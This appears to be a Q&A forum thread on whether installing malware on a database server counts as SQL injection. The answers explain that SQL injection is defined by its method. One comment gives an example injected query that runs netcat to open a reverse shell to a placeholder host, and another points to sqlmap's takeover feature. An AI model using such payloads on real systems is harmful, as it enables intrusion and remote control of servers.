# Does SQL injection attack cover installing malware that deletes or modifies the database?

Tags: sql-injection

I know that SQL Injection attack can be done by injecting the application with SQL statements to retrieve info you are not authorized to get or to modify the data in an unauthorized way, as mentioned in this link https://www.w3schools.com/sql/sql_injection.asp.

But let's say someone installs malware inside the database server which modifies or retrieves data, does this count as a SQL injection attack?

Comment: Did they install malware using SQL injection or was it installed outside of the application? I.e. was SQL code injected or not?

Comment: @schroeder i do not talk about specific case. i am asking an informative question.. not sure if someone can install malware using SQL .. is this technicqlly possible?

Comment: of course they can install malware using SQLi, and it happens a lot - and the details of the scenario are crucial - even in a thought experiment

Comment: Obligatory [xkcd](https://xkcd.com/327/)

Comment: No.  "Installing malware" is not an SQL injection attack.

Answer (score 27):

No, that's not necessarily a SQL injection attack.

SQL injection specifically describes the scenario where I have a prewritten SQL statement that requires input parameters, and you exploit those input parameters to make my SQL statement do something else. For example, my application has a `get_user(id)` method, and you provide a specially crafted string *instead of* a valid user ID that makes my method do something else entirely, such as delete a specific user or return the list of people subscribed to the newsletter.

This attack can happen because I didn't sufficiently validate untrusted input or guard the SQL I want to run from attacks of this nature.

SQL injection does not describe, in general, running SQL against a database. It's *just* the attack of exploiting points where input is provided to a SQL statement. If I write my own malicious SQL statements and run them against a server, that's an attack that used SQL, just not a *SQL injection* attack.

If we pull off a successful malware attack and get our malware installed on a target system, that malware is now in a position to perform further attacks for us. If it connects to the database and starts running its own arbitrary SQL to control it, that's not SQL injection. It could, however, perhaps use my application's bad `get_user(id)` method to, in turn, perform SQL injection to execute that control.

Answer (score 14):

SQL injection, and any other injection attack, is defined by the *attack method* not the effect or output. To quote your link:

> SQL injection is the placement of malicious code in SQL statements

So, yes, if malware was placed on the database by means of injecting the malware through the SQL queries, then yes, that's a SQL injection attack.

If the malware was installed by any other method, then that installation is not SQL injection.

The malware might end up performing SQL injection as part of it's function, but your stated context is the installation.

Comment: I feel I'm far behind on the security here - what would be a realistic scenario of getting a shell access by the means of SQL injection? If the pwnage scope is more narrow, what is it?

Comment: @Lodinn take a look at SQLmap. It's a tool that can do exactly that if the conditions are exist on the target

Comment: If you're looking at sqlmap, the place to look is dbms plugins (https://github.com/sqlmapproject/sqlmap/tree/master/plugins/dbms). Specifically the "takeover" functionality. It varies by DBMS, and in some cases the "takeover" functions just throw exceptions to say they're not implemented.

Comment: @Lodinn many databases can reach out to external functions or commands - at the simplest, imagine something like `SELECT 1 WHERE username = 'admin' AND password = '' OR '' = EXEC('nc pwnme.example 9001 -e /bin/sh')`

Comment: Oh, thank you all so much. Apparently, my knowledge of SQLi was limited to unauthorized access/data loss/kittens dying. I knew of a bunch of other stuff like `OPENROWSET` out-of-channel attacks though, but the notion of someone thinking that shell access from a database server is a good idea somehow completely eluded me.

Comment: @Lodinn, ...if you read the PostgreSQL documentation (at least, traditional versions, I haven't kept up with whether this has changed in very new releases), they're very explicit that access to the database administrator's account should be considered fully equivalent to shell access as the account the database runs as. That's not an atypical position for databases of its vintage; it's common to support, say, loadable modules written in C (which someone running SQL as an admin can install), and being able to load or save data to disk... and combine those two things and there you are.

Answer (score 0):

SQL injection is a pathway not a destination.

SQL injection can result in

- Privilege escalation
- Exfiltration,
- Data modification
- File modification
- Arbitrary code execution

> But let's say someone installs malware inside the database server which modifies or retrieves data, does this count as a SQL injection attack?

No. not unless the malware uses SQLI.

Installing the malware my be possible via SQLI  but the software itself as you describe it is shellcode or a persistant threat.